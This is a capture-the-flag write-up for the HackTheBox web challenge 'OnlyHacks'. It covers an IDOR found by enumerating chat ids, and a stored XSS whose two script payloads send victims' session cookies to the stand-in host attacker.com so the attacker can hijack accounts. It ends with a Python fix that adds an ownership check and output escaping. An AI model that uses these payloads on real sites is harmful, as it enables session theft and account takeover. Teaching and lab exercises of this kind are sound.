HTB-CTF {OnlyHacks}
CHALLENGE DESCRIPTION
Dating and matching can be exciting, especially during Valentine's, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?
Challenge Information
Category: Web
Difficulty: Very Easy
Objective: Exploit web vulnerabilities to retrieve the flag.
Tags: IDOR, XSS
Identifying Functionality
Upon accessing the OnlyHacks website, the following functionalities were observed:
Login Page (/login) – Users can log in using their credentials.
Registration Page (/register) – New users can sign up.
Dashboard (/dashboard) – Displays user profiles for matching.
Match Page (/chat) – Shows matched users and chat functionality.
SOLUTION
IDOR
Vulnerability Analysis
The chat system was vulnerable to IDOR because the endpoint checked only that the requester was logged in, not that the requested match belonged to them.
The chat endpoint used sequential numerical IDs, so other users' chat IDs could be guessed and substituted.
Modifying the id parameter returned another user's match details, which contained the flag.
Exploitation Steps
Register and log in to the website.
Like all profiles (there are only 4 users).
Navigate to the /chat page.
The requested URL was observed as:
https://IPHTB/chat/?id=6
Enumerate the id values and note which ones return a 200 response.
Change id=6 to id=3.
The response revealed the flag.
Stored Cross-Site Scripting (XSS) – Chat Exploit
Vulnerability Analysis
The chat feature was vulnerable to Stored XSS: JavaScript submitted in a message is saved and executed whenever another user views the chat.
This could be leveraged to steal session cookies and impersonate other users.
Exploitation Steps
Send a test payload in the chat to confirm that HTML is rendered:
For testing -- <h1>Hello</h1>
Send the following malicious XSS payload in the chat.
<script>document.location="http://attacker.com/?cookie="+document.cookie</script>
<script>fetch("http://attacker.com/?cookie="+document.cookie)</script>
When Retana views the chat, the script executes, sending their session cookie to the attacker.
Replace our session cookie with the stolen one.
Reloading the page logs the attacker into Retana’s account.
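A hardened version of the chat lookup and message rendering, written here as an added Python example (not the challenge's own code; the MATCHES table, user ids and function names are constructed): the view refuses matches the requester does not belong to, which closes the IDOR above, and escapes stored messages so the script payloads above are rendered as inert text.

```python
import html

# Constructed sample data (not from the challenge): two matches, three users.
# Match 3 holds a stored script payload of the kind shown above.
MATCHES = {
    3: {"users": {1, 2}, "messages": [(1, "hi"), (2, "<script>alert(1)</script>")]},
    6: {"users": {2, 3}, "messages": [(3, "hello <b>there</b>")]},
}


class NotFound(Exception):
    """Raised for both unknown and foreign matches (same response either way)."""


def get_chat(match_id, current_user):
    """Return the match only if the requester is one of its participants.

    The vulnerable endpoint looked up the match by id and returned it to any
    logged-in user, so changing ?id=6 to ?id=3 exposed someone else's chat.
    Unknown ids and ids belonging to other users both raise NotFound, so an
    enumeration of ids cannot tell which ones exist.
    """
    match = MATCHES.get(match_id)
    if match is None or current_user not in match["users"]:
        raise NotFound(match_id)
    return match


def render_message(sender, text):
    # Escape at output time: <, >, &, " and ' become entities, so a stored
    # <script> tag is shown as text instead of being executed by the viewer.
    return f'<li data-from="{sender}">{html.escape(text, quote=True)}</li>'


def chat_page(match_id, current_user):
    """Build the chat HTML for the requester, or raise NotFound."""
    match = get_chat(match_id, current_user)
    items = "".join(render_message(s, t) for s, t in match["messages"])
    return "<ul>" + items + "</ul>"
```

Marking the session cookie HttpOnly is the complementary fix: document.cookie then no longer exposes it even if one escape is missed.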